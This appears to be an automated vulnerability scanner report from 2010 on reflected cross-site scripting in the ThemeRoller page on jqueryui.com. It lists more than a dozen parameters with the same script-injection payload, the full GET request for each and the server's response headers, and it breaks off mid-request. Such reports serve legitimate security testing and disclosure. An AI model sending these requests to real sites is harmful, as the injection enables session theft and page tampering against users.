GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a45300"><script>alert(1)</script>52b8cc61183&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0a47"><script>alert(1)</script>60d08e980b0 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaad0a47"><script>alert(1)</script>60d08e980b0&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f63f"><script>alert(1)</script>163cc6d3cf8 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa19f63f"><script>alert(1)</script>163cc6d3cf8&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72395"><script>alert(1)</script>c2b2e0d945c was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999972395"><script>alert(1)</script>c2b2e0d945c&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b6c8"><script>alert(1)</script>794ffc806f6 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6b6c8"><script>alert(1)</script>794ffc806f6&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74466"><script>alert(1)</script>e3901bf7849 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px74466"><script>alert(1)</script>e3901bf7849 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce12a"><script>alert(1)</script>57ff54b00b6 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121ce12a"><script>alert(1)</script>57ff54b00b6&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebeba"><script>alert(1)</script>9e316bab61c was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222ebeba"><script>alert(1)</script>9e316bab61c&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f85e"><script>alert(1)</script>5ce0760a9c0 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555559f85e"><script>alert(1)</script>5ce0760a9c0&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d65d0"><script>alert(1)</script>042902ea54a was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ad65d0"><script>alert(1)</script>042902ea54a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7f9"><script>alert(1)</script>680216dd329 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222fb7f9"><script>alert(1)</script>680216dd329&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac58"><script>alert(1)</script>288ea6641f4 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=3636364ac58"><script>alert(1)</script>288ea6641f4&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1729"><script>alert(1)</script>d30e2b92665 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121e1729"><script>alert(1)</script>d30e2b92665&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3133c"><script>alert(1)</script>1841d7744ed was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif3133c"><script>alert(1)</script>1841d7744ed&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=